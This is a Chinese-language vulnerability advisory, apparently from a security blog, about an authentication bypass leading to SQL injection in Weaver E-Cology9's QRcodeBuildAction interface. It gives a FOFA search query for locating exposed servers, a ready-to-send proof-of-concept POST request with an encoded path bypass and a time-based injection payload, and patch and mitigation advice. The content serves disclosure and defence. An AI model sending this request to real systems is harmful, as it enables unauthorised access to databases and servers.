泛微E-Cology9 QRcodeBuildAction 身份认证绕过导致SQL注入漏洞

从此刻开始,知识不断涌进你的脑海。

产品介绍

泛微E-Cology9是一款针对中大型组织设计的高效协同办公OA(Ofice Automaion)系统,它融合了最新的技术理令和管理思想旨在为用户提供智能化、平台化、全程数字化的办公体验。 兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。包含流程、门户、知识、人事、沟通.客户、项目、财务等20多个功能模块。提供全面的业务流程管理、知识管理、人事管理、沟通协作等功能。

漏洞概述

由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤,导致攻击者利用多层编码的方式绕过身份认证进行SQL注入,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

资产测绘

FOFA:body="doCheckPopupBlocked"

漏洞复现

POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
 
modeid=127+WAITFOR+DELAY+'0%3a0%3a5'

PS:注入点为modeid并且每注入一次就需要更换参数值,场景类似于https://blog.csdn.net/qq_41904294/article/details/131666128 ,利用方式也一样

延时4秒

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、目前官方已发布安全补丁,建议受影响用户尽快升级至10.70及以上版本

https://www.weaver.com.cn/cs/securityDownload.asp#

特别声明:本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。相关资源仅供学习和研究使用,请在下载后24小时内删除。

THE END
喜欢就支持一下吧
点赞7 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称